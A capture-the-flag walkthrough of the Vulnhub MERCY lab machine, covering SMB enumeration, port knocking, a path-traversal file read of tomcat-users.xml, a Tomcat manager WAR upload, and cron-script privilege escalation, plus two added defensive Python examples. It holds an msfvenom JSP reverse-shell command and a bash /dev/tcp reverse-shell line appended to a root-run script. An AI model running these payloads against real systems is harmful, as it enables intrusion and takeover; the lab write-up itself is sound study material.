[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…

2024-07-26

Information Gathering

IP address: 192.168.101.151
Open ports: TCP 80, 22, 53, 110, 139, 143, 445, 993, 995, 8080

$ nmap -p- 192.168.101.151 --min-rate 1000 -sC -sV

PORT     STATE SERVICE     VERSION
53/tcp   open  domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp  open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: UIDL TOP STLS AUTH-RESP-CODE RESP-CODES PIPELINING SASL CAPA
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_imap-capabilities: LITERAL+ IDLE SASL-IR more listed IMAP4rev1 OK LOGIN-REFERRALS capabilities ENABLE LOGINDISABLEDA0001 STARTTLS post-login have Pre-login ID
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LITERAL+ IDLE more listed IMAP4rev1 SASL-IR LOGIN-REFERRALS AUTH=PLAINA0001 OK capabilities ENABLE post-login have Pre-login ID
995/tcp  open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_pop3-capabilities: UIDL TOP PIPELINING AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) CAPA
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-open-proxy: Proxy might be redirecting requests

Local Access

http://192.168.101.151:8080/robots.txt

$ echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg=='|base64 -d

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

$ enum4linux 192.168.101.151

pleadformercy
qiu
thisisasuperduperlonguser
fluffy

username:qiu
password:password

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password'

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password' -s qiu -r --depth 10

$ smbclient //192.168.101.151/qiu -U qiu

smb: \> lcd ./dev
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

$ cat .private/opensesame/config

Open the SSH and HTTP ports via port knocking

http:159,27391,4
ssh:17301,28504,9999

$ knock 192.168.101.151 17301 28504 9999 -d 300 -v

$ knock 192.168.101.151 159 27391 4 -d 300 -v

$ dirb http://192.168.101.151/

http://192.168.101.151/robots.txt

http://192.168.101.151/nomercy/

http://192.168.101.151/mercy/

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../etc/passwd

$ whatweb http://192.168.101.151:8080 -v

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../var/lib/tomcat7/conf/tomcat-users.xml
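The two requests above read /etc/passwd and tomcat-users.xml through the same file parameter. The page does not show the source of code.php, so the vulnerable function below is a model of what an include with no containment check does, written for this walkthrough and not the RIPS or MERCY code; the webroot path is an assumption. The hardened function resolves the candidate path and refuses anything that leaves the webroot, which is the fix a developer would ship for this class of bug.

```python
"""Path-containment check for a file-include parameter (added example, not code.php)."""
import os

# Assumed on-disk location of the vulnerable script's directory.
WEBROOT = "/var/www/html/nomercy/windows"
# The two traversal values used against code.php in the walkthrough.
PASSWD_TRAVERSAL = "../../../../../../etc/passwd"
TOMCAT_USERS_TRAVERSAL = "../../../../../../var/lib/tomcat7/conf/tomcat-users.xml"


def vulnerable_resolve(webroot, user_file):
    """Model of the bug: join and normalise, never check where the result landed."""
    return os.path.normpath(os.path.join(webroot, user_file))


def safe_resolve(webroot, user_file):
    """Return an absolute path guaranteed to sit inside webroot, else raise ValueError."""
    if "\x00" in user_file:
        raise ValueError("NUL byte in file name")
    root = os.path.realpath(webroot)
    # realpath also collapses '..' and follows symlinks, so a symlink planted
    # inside the webroot cannot be used to point back outside it.
    candidate = os.path.realpath(os.path.join(root, user_file))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes webroot: {user_file!r}")
    return candidate


def is_contained(webroot, user_file):
    """True when safe_resolve would accept user_file."""
    try:
        safe_resolve(webroot, user_file)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in (PASSWD_TRAVERSAL, TOMCAT_USERS_TRAVERSAL, "index.php", "/etc/hostname"):
        print(f"{name!r:60} vulnerable -> {vulnerable_resolve(WEBROOT, name)}"
              f"  contained: {is_contained(WEBROOT, name)}")
```

An absolute value such as /etc/hostname is rejected as well, because os.path.join discards the root when the second argument is absolute and the containment check then fails; an allow-list of file names is the stricter option when the set of includable pages is known.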

username:fluffy
password:freakishfluffybunny

username:thisisasuperduperlonguser
password:heartbreakisinevitable

http://192.168.101.151:8080/manager/html

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.128 LPORT=10032 -f war >reverse.war

http://192.168.101.151:8080/reverse/

Local.txt screenshot

Local.txt content

Plz have mercy on me! 🙁 🙁

Privilege Escalation

python -c 'import pty;pty.spawn("/bin/bash")'

tomcat7@MERCY:/var/lib/tomcat7$ su fluffy

$ ls -la /home/fluffy/.private/secrets

$ ./pspy32

$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10034 0>&1'">>/home/fluffy/.private/secrets/timeclock
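The escalation works because a script in fluffy's home directory is executed by a privileged scheduled job (as pspy showed) while remaining writable by fluffy. The audit below is an added example for this walkthrough, not a tool from the box: given the path of a script a cron job runs, it reports the properties that make it hijackable (owner differs from the job's user, group or world write bit, writable parent directory without the sticky bit). The demo tree it builds in a temporary directory, with a "timeclock" script standing in for the one on MERCY, is constructed.

```python
"""Audit scripts run by privileged cron jobs for writability by other users."""
import os
import stat
import tempfile


def audit_script(path, runner_uid=0):
    """Return why a script executed as runner_uid (root by default) could be replaced."""
    findings = []
    st = os.stat(path)
    if st.st_uid != runner_uid:
        findings.append("owned-by-other-user")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    # A writable parent lets anyone unlink and recreate the file even if the
    # file itself is read-only; the sticky bit (as on /tmp) blocks that.
    if parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent-dir-writable")
    return findings


def _write_script(path, mode):
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho tick\n")
    os.chmod(path, mode)


def build_demo_tree():
    """Constructed fixture: one properly locked-down script, one like MERCY's timeclock."""
    base = tempfile.mkdtemp(prefix="cronaudit-")
    safe_dir = os.path.join(base, "sbin")
    os.mkdir(safe_dir)
    os.chmod(safe_dir, 0o755)
    safe = os.path.join(safe_dir, "backup.sh")
    _write_script(safe, 0o755)

    weak_dir = os.path.join(base, "secrets")
    os.mkdir(weak_dir)
    os.chmod(weak_dir, 0o777)
    weak = os.path.join(weak_dir, "timeclock")
    _write_script(weak, 0o777)
    return {"safe": safe, "weak": weak}


def demo():
    """Audit the fixture from the point of view of the current user as the job runner."""
    tree = build_demo_tree()
    me = os.getuid()
    return {
        "safe": audit_script(tree["safe"], runner_uid=me),
        "weak": audit_script(tree["weak"], runner_uid=me),
        # Same locked-down file, but run by a different account: ownership alone is a finding.
        "foreign_owner": audit_script(tree["safe"], runner_uid=me + 1),
    }


if __name__ == "__main__":
    for label, findings in demo().items():
        print(f"{label:14} {findings or 'ok'}")
```

On a real host the paths come from /etc/crontab, /etc/cron.d and the root crontab; the ownership check is the one that would have flagged the MERCY timeclock script even if its mode bits had been tightened, since it lived under a user's home directory while being run with higher privileges.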

Proof.txt screenshot

Proof.txt content

Congratulations on rooting MERCY. 🙂
